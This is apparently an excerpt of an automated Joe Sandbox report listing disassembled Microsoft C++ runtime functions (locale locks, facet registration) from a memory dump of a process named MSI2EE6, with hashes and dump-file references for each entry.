                                                                          • Instruction ID: 794bfc074012fd72a4c525dc2de036065c3bc35b3aa4e1950b47799257936d2d
                                                                          • Opcode Fuzzy Hash: 6f0b6d1a296d07ca1f6bb1aeeb608045f7aa630e711925324561914b227fd81c
                                                                          • Instruction Fuzzy Hash: 3A01F53691025A8BCB09EBA4DA55BFFB7B5BF44720F244409F911A7391DF349E01CB90
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF51E3
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF51ED
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF523E
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF525E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: e5d252f8e5096dde0ad18f8c25174814f94691a5c0310aea0befce39bd43c162
                                                                          • Instruction ID: 257f7fa406021742eeaf0a5a0df39c26e3222e4501460bc84c17801c776bb424
                                                                          • Opcode Fuzzy Hash: e5d252f8e5096dde0ad18f8c25174814f94691a5c0310aea0befce39bd43c162
                                                                          • Instruction Fuzzy Hash: 2E01D235D0051A9BCB09EBA4DA11BBEB7B5BF94320F244509FA11A7392CF749E00C780
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEB109
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEB113
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEB164
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEB184
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: c08f399a38dec568f044ffc8ea7c5e4de8d0e6b475211a78783f29d63c069fc3
                                                                          • Instruction ID: 8b88a3dbf5b0390de10588f38e79e1125635610f0d098abc1c06e5fddb0dfa81
                                                                          • Opcode Fuzzy Hash: c08f399a38dec568f044ffc8ea7c5e4de8d0e6b475211a78783f29d63c069fc3
                                                                          • Instruction Fuzzy Hash: C301453291029A9FCB04EBA4CA66BBEB7B5FF84320F240509F815A7381CF348E01C790
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE4165
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE416F
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AE41C0
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE41E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 10e7cc6ba9ebd3a3ea070016e2b9faad1f3cf8d8d8ab0dd83dc2dc147988bdb4
                                                                          • Instruction ID: c45504e15828d512e0abbeb0e9326f9502530a2d1fa686aa5895edb33b24baa0
                                                                          • Opcode Fuzzy Hash: 10e7cc6ba9ebd3a3ea070016e2b9faad1f3cf8d8d8ab0dd83dc2dc147988bdb4
                                                                          • Instruction Fuzzy Hash: 3A01D23590025A9BCB05EBA4DA11BBE77B9BF98364F244509F811A7391CF349E00CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF53A2
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF53AC
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF53FD
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF541D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 143241fb6e9cdf7323c605ac448406d822782842cb9fa3617b37e6b005424548
                                                                          • Instruction ID: b4e1f3d577acffc4711e162b9765776bdd884e94b681c195ccd70eea2af9a65a
                                                                          • Opcode Fuzzy Hash: 143241fb6e9cdf7323c605ac448406d822782842cb9fa3617b37e6b005424548
                                                                          • Instruction Fuzzy Hash: 2301C035D106198BCB09ABA4C961ABEB7B5BF54321F24850AFA11AB391DF749E01CB90
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF530D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5317
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF5368
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5388
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: b3a0cc2a7bf96dc3b6b3e03cdd4e3ec3370c663c7449bf29fb7e409a4efe869d
                                                                          • Instruction ID: 8d83054860f10afd6d27d6cf72c590d7101eb44d877a3907e34310032fcd8436
                                                                          • Opcode Fuzzy Hash: b3a0cc2a7bf96dc3b6b3e03cdd4e3ec3370c663c7449bf29fb7e409a4efe869d
                                                                          • Instruction Fuzzy Hash: A401F936D001199FCB09EBB4C921BBE7776AF84360F244509FA116B391DF749E00CB80
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF55F6
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5600
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF5651
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5671
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: bbca4e901a3717706496f61637bc9316e954d7d7b22377d6f60a908e4d8f9417
                                                                          • Instruction ID: bd935fe1889f0cb20517646d5873e2d580fcc678b3187749fbcfe3fbe929344a
                                                                          • Opcode Fuzzy Hash: bbca4e901a3717706496f61637bc9316e954d7d7b22377d6f60a908e4d8f9417
                                                                          • Instruction Fuzzy Hash: F701D235D002198BCB05EBB4CA21BBEB7B5BF44360F684909FA21AB391DF749E01C780
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF5561
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AF556B
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AF55BC
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF55DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 0f8411d6d84238cc0fe834092d7be9d733761112048e6843e8f11974b8c69762
                                                                          • Instruction ID: 173053949ec261f56d7b702d64b9ebbe42cf32c473e7d6d66c6e4d52d527a702
                                                                          • Opcode Fuzzy Hash: 0f8411d6d84238cc0fe834092d7be9d733761112048e6843e8f11974b8c69762
                                                                          • Instruction Fuzzy Hash: 2E01D236D005199BCB09EBA4C951BBEB7B6AF84320F24850AFA11A7381DF349E01CB80
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA68F
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA699
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEA6EA
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA70A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 02943a20566acbb224dd7d3e64102601e12cf0055bc2a01f86b37371f8eac4b5
                                                                          • Instruction ID: af2e5e9d38e0bc244c0bd78a7b4903684f9a72eb7e1a9fcb7c412efd8b2ce2f9
                                                                          • Opcode Fuzzy Hash: 02943a20566acbb224dd7d3e64102601e12cf0055bc2a01f86b37371f8eac4b5
                                                                          • Instruction Fuzzy Hash: D7012835900299CBCB05EBA4C951BBE7BB5BF54324F244409F811AB391DF349E00CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA724
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA72E
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEA77F
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA79F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 80d7c5f4984c63a5ad63bc7aab722f3e564c4c6a19d5fa14e1515d04067409e6
                                                                          • Instruction ID: acba5b4ac6f646b28f516324271eb3f16bc5aec203d66fc8bfff84cd4e80e813
                                                                          • Opcode Fuzzy Hash: 80d7c5f4984c63a5ad63bc7aab722f3e564c4c6a19d5fa14e1515d04067409e6
                                                                          • Instruction Fuzzy Hash: 1801F53590025A9FCB05EBA4CA15BBE7BB5BF94320F24440AF911AB391DF34AE00C781
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAEB5
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAEBF
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEAF10
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAF30
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 54b6c324dbc34629d44f8026adf309a7d6b25c8833848a58343ac880eb2bcb85
                                                                          • Instruction ID: 434306559ba1ce13a02551892b3ff3a94233228e6f27c38e629a87772c236ea1
                                                                          • Opcode Fuzzy Hash: 54b6c324dbc34629d44f8026adf309a7d6b25c8833848a58343ac880eb2bcb85
                                                                          • Instruction Fuzzy Hash: 5F012876D00259CBCB05EBA8C911BBEB7B5BF58320F644909F822A7391CF349E01CB91
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAE20
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAE2A
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEAE7B
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAE9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: 3dc4217596fa84396a4fc5e4b7fc9344c4ade188fc144fbd59e1bd1d7a2b573b
                                                                          • Instruction ID: 2cb8c2dacb55376b96c076333d7f14d29ac24f01982cc5f18872e704a152f11d
                                                                          • Opcode Fuzzy Hash: 3dc4217596fa84396a4fc5e4b7fc9344c4ade188fc144fbd59e1bd1d7a2b573b
                                                                          • Instruction Fuzzy Hash: 7801F536900269CFCB09EBA4CA11BBEB7B5AF94320F244409F811AB391CF349E00CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEAF4A
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEAF54
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • std::_Facet_Register.LIBCPMT ref: 00AEAFA5
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEAFC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                          • String ID:
                                                                          • API String ID: 2854358121-0
                                                                          • Opcode ID: c5d9e79c25f8a31387af248cb99b35e165d88b9f05156380f37692a0837fa2ae
                                                                          • Instruction ID: d00280010b7f646e21e08b12a75fdc824f32534f2f18f7c7122e1fe6d21b3c69
                                                                          • Opcode Fuzzy Hash: c5d9e79c25f8a31387af248cb99b35e165d88b9f05156380f37692a0837fa2ae
                                                                          • Instruction Fuzzy Hash: F501D2769002599FCB05EBA5D911BBE77B5AF94320F244409F811A7381CF349E01CB81
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AE667B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AE6686
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE66F4
                                                                            • Part of subcall function 00AE67D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AE67EF
                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00AE66A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                          • String ID:
                                                                          • API String ID: 677527491-0
                                                                          • Opcode ID: f6cc54a37c50fa3efecd894396f0fa58a6103c9ad41120df17d5cd8981315286
                                                                          • Instruction ID: 0a94e6ac0bd3d9ea99d0dbad491c31f6aff4d2ff295b7ceed938a675ff54da6f
                                                                          • Opcode Fuzzy Hash: f6cc54a37c50fa3efecd894396f0fa58a6103c9ad41120df17d5cd8981315286
                                                                          • Instruction Fuzzy Hash: 9501DF75A012A48BC70AEB20D952A7D7BA1BF98390B148459ED0657381CF34AE02CBC1
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA7B9
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA7C3
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • ctype.LIBCPMT ref: 00AEA7FD
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA834
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                                          • String ID:
                                                                          • API String ID: 3358926169-0
                                                                          • Opcode ID: 77ad6374ad17f1ac34296fdc91017dbdd130ae56816a3f9c1fb0cd9767730ae2
                                                                          • Instruction ID: 54675c890fac935081a09a278354390a2b04f4492c5138118e73ad8ebe121e61
                                                                          • Opcode Fuzzy Hash: 77ad6374ad17f1ac34296fdc91017dbdd130ae56816a3f9c1fb0cd9767730ae2
                                                                          • Instruction Fuzzy Hash: C8F0B43581028A9BDB09FBA0CA62BBF3334AF10364FA44519F621AB2C1DF349E05C781
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA8E3
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA8ED
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • messages.LIBCPMT ref: 00AEA927
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA95E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                          • String ID:
                                                                          • API String ID: 50917705-0
                                                                          • Opcode ID: a740aa7721ace0b29ce27993b0a5a0aeb792e8b95417f292288bd8d35c830374
                                                                          • Instruction ID: 14a96133295658c6790809867ffa08405b92955f197e1fcdda0caeb994e6806b
                                                                          • Opcode Fuzzy Hash: a740aa7721ace0b29ce27993b0a5a0aeb792e8b95417f292288bd8d35c830374
                                                                          • Instruction Fuzzy Hash: 14F0E93181024A9BCB05F7A1CA12BBF3774AF50324F650409F5116B2C2EF34EE04C791
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AEA84E
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AEA858
                                                                            • Part of subcall function 00ADC020: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC050
                                                                            • Part of subcall function 00ADC020: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC078
                                                                          • messages.LIBCPMT ref: 00AEA892
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEA8C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
